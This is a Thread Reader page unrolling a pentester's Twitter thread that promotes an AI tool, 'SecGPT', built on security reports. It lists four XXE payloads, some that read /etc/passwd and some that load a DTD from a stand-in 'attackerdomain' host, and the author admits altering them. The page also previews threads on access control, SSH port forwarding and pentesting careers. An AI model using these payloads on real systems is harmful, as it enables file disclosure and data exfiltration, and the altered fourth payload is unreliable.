Share this page!

🇷🇴 cristi Profile picture
Twitter logo
Mar 13 7 tweets 3 min read
Boost your pentesting and bug bounty game with SecGPT's AI insights from thousands of online security reports.

I've asked it for some XXE payloads found in the reports. Image
1. Basic XXE payload

`<!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo>`
2. Blind XXE payload

`<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://attackerdomain/xxe.dtd">%xxe;]><foo></foo>`
3. XXE payload with external entity injection

`<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://attackerdomain/xxe.dtd">%xxe;]><foo>&xxe;</foo>`
4. XXE payload with parameter entity injection

`<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://attackerdomain/xxe.dtd">%xxe;]><foo>&xe;%param1;%xe;</foo>`
5. Had to modify the payloads in the image because Twitter flags them as malicious
6. Be the first to know when it's released. Subscribe to the free newsletter on cristivlad.substack.com

#pentesting #infosec #ai #cybersecurity #chatgpt #bugbounty

• • •

Missing some Tweet in this thread? You can try to force a refresh
 

Keep Current with 🇷🇴 cristi

🇷🇴 cristi Profile picture

Stay in touch and get notified when new unrolls are available from this author!

Read all threads

This Thread may be Removed Anytime!

PDF

Twitter may remove this content at anytime! Save it as PDF for later use!

Try unrolling a thread yourself!

how to unroll video
  1. Follow @ThreadReaderApp to mention us!

  2. From a Twitter thread mention us with a keyword "unroll"
@threadreaderapp unroll

Practice here first or read more on our help page!

More from @CristiVlad25

🇷🇴 cristi Profile picture
Mar 11
Unlocking the Secrets: Breaking Access Controls, the basics 👇

(from the AI model I'm currently training on security reports) Image
1. Direct object reference

This occurs when an attacker is able to access a resource directly by manipulating a parameter in the URL or form data.
2. Horizontal privilege escalation

This occurs when an attacker is able to access resources or perform actions that are intended for another user with the same level of access.
Read 8 tweets
🇷🇴 cristi Profile picture
Mar 8
Large language models exhibit emergent abilities 👇
1. Large language models (LLMs) exhibit emergent abilities after crossing a critical value of effective parameters
2. Emergent abilities include performing arithmetic, answering questions, summarizing passages, and more
Read 6 tweets
🇷🇴 cristi Profile picture
Mar 7
As much as I love automation in recon, 98% of the findings in my pentests have nothing to do with it. Why? 👇
1. Inspired by @NahamSec recent video.

First, in a large majority of the web pentests, clients want me to focus only on their app and it's features. So, there's no need for subdomain enumeration/bruteforcing or any other large recon tactic.
2. This doesn't mean that I don't use automation. I automate some of the boring and repetitive tasks via bash and python.
Read 9 tweets
🇷🇴 cristi Profile picture
Mar 4
More practice, less theory (but not 0 theory)

In the past, I criticized Top 1% THM who know close to nothing about the real-world aspects of a pentest.

My point was not understood and I got a lot of hate for it. Image
1. Again, there's less value in being Top 1% if your experience is purely theoretical.

Yet, you will go way further if you complement your experience (from day-to-day work in cybersecurity) with continuous practice on THM and other platforms (focusing on non-CTFish materials).
2. If you're not working in cybersecurity yet, but you want to, no problem.

Get your daily real-world experience from VDPs (and not paid bounties).
Read 4 tweets
🇷🇴 cristi Profile picture
Feb 27
SSH local port forwarding, explained to humans:

ssh -L [local_address:]local_port:remote_address:remote_port [user@]ssh_server
1.🌐💻 Have you ever wanted to access a remote server as if it were running on your local machine? That's where local port forwarding comes in!
2.🛣️📬 Think of it like a mail forwarding service: just as you'd tell the service to forward your mail to your new address, you can tell SSH to forward traffic from a remote server to your local machine.
Read 7 tweets
🇷🇴 cristi Profile picture
Feb 26
Not a paid sponsorship, but I'd love to @HelloPaperspace :) 👇

For the last 3-4 years, I had a VPS with 16 GB of RAM and 8 CPUs for which I paid $0.16 per hour of usage.
1. A few days ago I said I'd upgrade to a VPS with 30 GB of RAM and 12 CPUs.

Definitely a dramatically huge increase in performance! Still quite cheap at $0.3/h.

My usual monthly usage so far has been 100 hours or less.
2. I use it for cybersecurity research and for machine learning. I'll probably get an A100 in the future, which is about $3 per hour, but it's the best GPU in town. Need to make more money first.
Read 7 tweets

Did Thread Reader help you today?

Support us! We are indie developers!

This site is made by just two indie developers on a laptop doing marketing, support and development! Read more about the story.

Become a Premium Member ($3/month or $30/year) and get exclusive features!

Become Premium

Don't want to be a Premium member but still want to support us?

Make a small donation by buying us coffee ($5) or help with server cost ($10)

Donate via Paypal

Or Donate anonymously using crypto!

Ethereum

0xfe58350B80634f60Fa6Dc149a72b4DFbc17D341E copy

Bitcoin

3ATGMxNzCUFzxpMCHL5sWSt4DVtS8UqXpi copy

Thank you for your support!

Follow Us on Twitter!

Send Email!

:(